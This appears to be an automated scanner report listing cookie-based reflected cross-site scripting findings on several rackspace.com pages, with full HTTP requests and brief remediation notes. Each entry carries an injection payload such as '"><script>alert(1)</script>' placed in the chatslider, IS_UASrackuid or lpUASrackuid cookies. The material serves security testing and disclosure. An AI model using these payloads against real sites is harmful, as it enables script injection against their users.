Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D28ba8"><script>alert(1)</script>07d40e423d7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ff18"%3balert(1)//9c2b8dcbef7 was submitted in the chatslider cookie. This input was echoed as 1ff18";alert(1)//9c2b8dcbef7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1ff18"%3balert(1)//9c2b8dcbef7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff4da"%3balert(1)//9ce94872ae3 was submitted in the IS_UASrackuid cookie. This input was echoed as ff4da";alert(1)//9ce94872ae3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ff4da"%3balert(1)//9ce94872ae3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e4b"><script>alert(1)</script>666321f28cc was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e1e4b"><script>alert(1)</script>666321f28cc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69814"%3balert(1)//84f738c2ee7 was submitted in the chatslider cookie. This input was echoed as 69814";alert(1)//84f738c2ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D69814"%3balert(1)//84f738c2ee7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e69ee"><script>alert(1)</script>975c3bcb5eb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De69ee"><script>alert(1)</script>975c3bcb5eb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d35"><script>alert(1)</script>28a334b90f5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f828d35"><script>alert(1)</script>28a334b90f5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c337"%3balert(1)//d1ca4121bc2 was submitted in the IS_UASrackuid cookie. This input was echoed as 3c337";alert(1)//d1ca4121bc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83c337"%3balert(1)//d1ca4121bc2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 42310
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33fb5"%3balert(1)//93b1f01f944 was submitted in the chatslider cookie. This input was echoed as 33fb5";alert(1)//93b1f01f944 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D33fb5"%3balert(1)//93b1f01f944; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 871cf"><script>alert(1)</script>ca077b1a90d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D871cf"><script>alert(1)</script>ca077b1a90d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31aa"><script>alert(1)</script>7592d91ab4a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e31aa"><script>alert(1)</script>7592d91ab4a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83faa"><script>alert(1)</script>0ddf46aef0e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f883faa"><script>alert(1)</script>0ddf46aef0e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c77e"%3balert(1)//a445432c1d7 was submitted in the IS_UASrackuid cookie. This input was echoed as 4c77e";alert(1)//a445432c1d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
